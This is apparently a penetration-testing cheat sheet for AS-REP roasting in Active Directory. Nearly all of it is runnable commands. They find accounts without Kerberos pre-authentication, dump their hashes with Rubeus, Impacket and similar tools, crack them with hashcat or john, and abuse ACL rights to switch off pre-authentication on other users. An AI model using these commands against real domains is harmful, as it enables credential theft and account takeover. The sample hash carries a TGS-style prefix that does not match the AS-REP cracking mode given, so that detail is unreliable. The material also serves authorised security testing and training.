AS-REP Roasting

Although rare, once in a while you will find that a user does not require Kerberos Pre-Authentication in order to access a service.

If you discover users with Pre-Auth disabled you can grab their hashes, crack them, and then request tickets if you have the privilges to access particular services.

Steps to AS-REP Roast

Step 1 - Discover AS-REP Roastable Users

• From Powershell

# PowerView_dev
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname

# AD Module
Get-ADUser -Filter {DoesNotRequirePreauth -eq $true} -Properties DoesNotRequirePreAuth | select samaccountname

Step 2 - Grabbing the User Hashes

• From Powershell

# ASREPRoast.ps1
. .\ASREPRoast.ps1
Get-ASREPHash -UserName VPN403User

# rubeus.exe
.\Rubeus.exe asreproast

# ASREPRoast.ps1
Invoke-ASREPRoast | fl

• Linux

# Impacket
python GetNPUsers.py <user>@<domain> -usersfile <userfile>

# Crackmapexec
crackmapexec ldap <ip> -u <user> -p <pass> --asreproast ASREPROAST

# Kerbrute
./kerbrute --dc <ip> -d <domain> userenum <userfile> [--downgrade]

Step 3 - Cracking the Hashes

• Note: make sure the hash ETYPE is 23 and not 18, otherwise Hashcat cannot crack it. Also make sure 23 is in the hash like so, otherwise you may have to add it manually before cracking:

'$krb5tgs$23$*ticket*$d0ed768218535536a...'

• If you used kerbrute, you can use the --downgrade option to obtain the ETYPE 23 hash

# Hashcat
hashcat -m 18200 hashfile.txt rockyou.txt
# or john
john hashfile.txt -wordlist=rockyou.txt

If You Would Like to Disable Preauth on a User

• This can be useful if you have permissions on other users.

# Find users you can modify
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<group>"}

# Then disable PreAuth on the user (executing this again will re-enable PreAuth)
Set-DomainObject -Identity <user_to_change> -XOR @{useraccountcontrol=4194304} -Verbose

# Then check if the user PreAuth is now disabled
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname